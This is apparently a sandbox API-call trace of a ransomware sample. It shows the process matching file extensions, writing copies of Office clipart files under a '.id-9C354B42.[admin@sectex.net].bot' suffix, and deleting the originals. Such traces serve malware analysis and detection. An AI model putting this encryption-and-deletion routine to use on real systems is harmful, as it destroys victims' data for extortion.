	[0169.345] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152898.wmf")) returned 1
	[0169.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.346] lstrlenW (lpString=".doc") returned 4
	[0169.346] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.346] lstrlenW (lpString=".docx") returned 5
	[0169.346] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.346] lstrlenW (lpString=".pdf") returned 4
	[0169.346] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.346] lstrlenW (lpString=".xls") returned 4
	[0169.346] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.346] lstrlenW (lpString=".xlsx") returned 5
	[0169.346] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.346] lstrlenW (lpString=".ppt") returned 4
	[0169.346] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.346] lstrlenW (lpString=".zip") returned 4
	[0169.346] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.346] lstrlenW (lpString=".rar") returned 4
	[0169.346] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.346] lstrlenW (lpString=".bz2") returned 4
	[0169.346] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.346] lstrlenW (lpString=".7z") returned 3
	[0169.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString=".dbf") returned 4
	[0169.347] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString=".1cd") returned 4
	[0169.347] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString=".jpg") returned 4
	[0169.347] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString=".doc") returned 4
	[0169.347] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString=".docx") returned 5
	[0169.347] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.347] lstrlenW (lpString=".pdf") returned 4
	[0169.347] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString=".xls") returned 4
	[0169.347] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.347] lstrlenW (lpString=".xlsx") returned 5
	[0169.347] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.347] lstrlenW (lpString=".ppt") returned 4
	[0169.347] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.347] lstrlenW (lpString=".zip") returned 4
	[0169.347] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.347] lstrlenW (lpString=".rar") returned 4
	[0169.347] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString=".bz2") returned 4
	[0169.347] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.347] lstrlenW (lpString=".7z") returned 3
	[0169.347] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.348] lstrlenW (lpString=".dbf") returned 4
	[0169.348] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.348] lstrlenW (lpString=".1cd") returned 4
	[0169.348] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.348] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 63
	[0169.348] lstrlenW (lpString=".jpg") returned 4
	[0169.348] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.348] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.348] lstrlenW (lpString="J0153093.WMF") returned 12
	[0169.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.371] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8880) returned 1
	[0169.371] CloseHandle (hObject=0x3c4) returned 1
	[0169.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf")) returned 0x20
	[0169.372] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.372] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.372] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.373] GetLastError () returned 0x0
	[0169.373] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x22b0, lpOverlapped=0x0) returned 1
	[0169.395] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x22c0, lpOverlapped=0x0) returned 1
	[0169.396] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.396] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.396] SetEndOfFile (hFile=0x180) returned 1
	[0169.396] CloseHandle (hObject=0x180) returned 1
	[0169.396] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.396] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.398] CloseHandle (hObject=0x3c4) returned 1
	[0169.399] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.399] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153093.wmf")) returned 1
	[0169.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.399] lstrlenW (lpString=".doc") returned 4
	[0169.399] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.399] lstrlenW (lpString=".docx") returned 5
	[0169.400] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.400] lstrlenW (lpString=".pdf") returned 4
	[0169.400] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString=".xls") returned 4
	[0169.400] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.400] lstrlenW (lpString=".xlsx") returned 5
	[0169.400] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.400] lstrlenW (lpString=".ppt") returned 4
	[0169.400] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString=".zip") returned 4
	[0169.400] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.400] lstrlenW (lpString=".rar") returned 4
	[0169.400] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString=".bz2") returned 4
	[0169.400] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString=".7z") returned 3
	[0169.400] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString=".dbf") returned 4
	[0169.400] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString=".1cd") returned 4
	[0169.400] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString=".jpg") returned 4
	[0169.400] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.400] lstrlenW (lpString=".doc") returned 4
	[0169.400] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.400] lstrlenW (lpString=".docx") returned 5
	[0169.400] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0169.400] lstrlenW (lpString=".pdf") returned 4
	[0169.401] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString=".xls") returned 4
	[0169.401] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.401] lstrlenW (lpString=".xlsx") returned 5
	[0169.401] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0169.401] lstrlenW (lpString=".ppt") returned 4
	[0169.401] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.401] lstrlenW (lpString=".zip") returned 4
	[0169.401] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.401] lstrlenW (lpString=".rar") returned 4
	[0169.401] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString=".bz2") returned 4
	[0169.401] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString=".7z") returned 3
	[0169.401] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.401] lstrlenW (lpString=".dbf") returned 4
	[0169.401] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.401] lstrlenW (lpString=".1cd") returned 4
	[0169.401] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.401] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153093.WMF") returned 63
	[0169.401] lstrlenW (lpString=".jpg") returned 4
	[0169.401] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.401] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.401] lstrlenW (lpString="J0153299.WMF") returned 12
	[0169.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.402] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=36620) returned 1
	[0169.402] CloseHandle (hObject=0x3c4) returned 1
	[0169.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf")) returned 0x20
	[0169.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.402] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.402] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.403] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.403] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.403] GetLastError () returned 0x0
	[0169.403] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x8f0c, lpOverlapped=0x0) returned 1
	[0169.422] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8f10, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8f10, lpOverlapped=0x0) returned 1
	[0169.423] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.423] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.423] SetEndOfFile (hFile=0x180) returned 1
	[0169.423] CloseHandle (hObject=0x180) returned 1
	[0169.423] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.423] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.426] CloseHandle (hObject=0x3c4) returned 1
	[0169.426] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153299.wmf")) returned 1
	[0169.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.427] lstrlenW (lpString=".doc") returned 4
	[0169.427] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.427] lstrlenW (lpString=".docx") returned 5
	[0169.427] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0169.427] lstrlenW (lpString=".pdf") returned 4
	[0169.427] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.427] lstrlenW (lpString=".xls") returned 4
	[0169.427] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.427] lstrlenW (lpString=".xlsx") returned 5
	[0169.427] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0169.427] lstrlenW (lpString=".ppt") returned 4
	[0169.427] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.427] lstrlenW (lpString=".zip") returned 4
	[0169.427] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.427] lstrlenW (lpString=".rar") returned 4
	[0169.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString=".bz2") returned 4
	[0169.428] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString=".7z") returned 3
	[0169.428] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString=".dbf") returned 4
	[0169.428] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString=".1cd") returned 4
	[0169.428] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString=".jpg") returned 4
	[0169.428] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString=".doc") returned 4
	[0169.428] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString=".docx") returned 5
	[0169.428] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0169.428] lstrlenW (lpString=".pdf") returned 4
	[0169.428] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString=".xls") returned 4
	[0169.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.428] lstrlenW (lpString=".xlsx") returned 5
	[0169.428] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0169.428] lstrlenW (lpString=".ppt") returned 4
	[0169.428] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.428] lstrlenW (lpString=".zip") returned 4
	[0169.428] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.428] lstrlenW (lpString=".rar") returned 4
	[0169.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.428] lstrlenW (lpString=".bz2") returned 4
	[0169.429] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.429] lstrlenW (lpString=".7z") returned 3
	[0169.429] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.429] lstrlenW (lpString=".dbf") returned 4
	[0169.429] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.429] lstrlenW (lpString=".1cd") returned 4
	[0169.429] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153299.WMF") returned 63
	[0169.429] lstrlenW (lpString=".jpg") returned 4
	[0169.429] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.429] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.429] lstrlenW (lpString="J0153302.WMF") returned 12
	[0169.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.440] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=30800) returned 1
	[0169.440] CloseHandle (hObject=0x3c4) returned 1
	[0169.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf")) returned 0x20
	[0169.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0169.441] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.441] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0169.441] GetLastError () returned 0x0
	[0169.441] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7850, lpOverlapped=0x0) returned 1
	[0169.625] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7860, lpOverlapped=0x0) returned 1
	[0169.626] ReadFile (in: hFile=0x3c4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.626] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.626] SetEndOfFile (hFile=0x180) returned 1
	[0169.627] CloseHandle (hObject=0x180) returned 1
	[0169.627] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.627] SetEndOfFile (hFile=0x3c4) returned 1
	[0169.629] CloseHandle (hObject=0x3c4) returned 1
	[0169.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0153302.wmf")) returned 1
	[0169.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153302.WMF") returned 63
	[0169.646] lstrlenW (lpString=".doc") returned 4
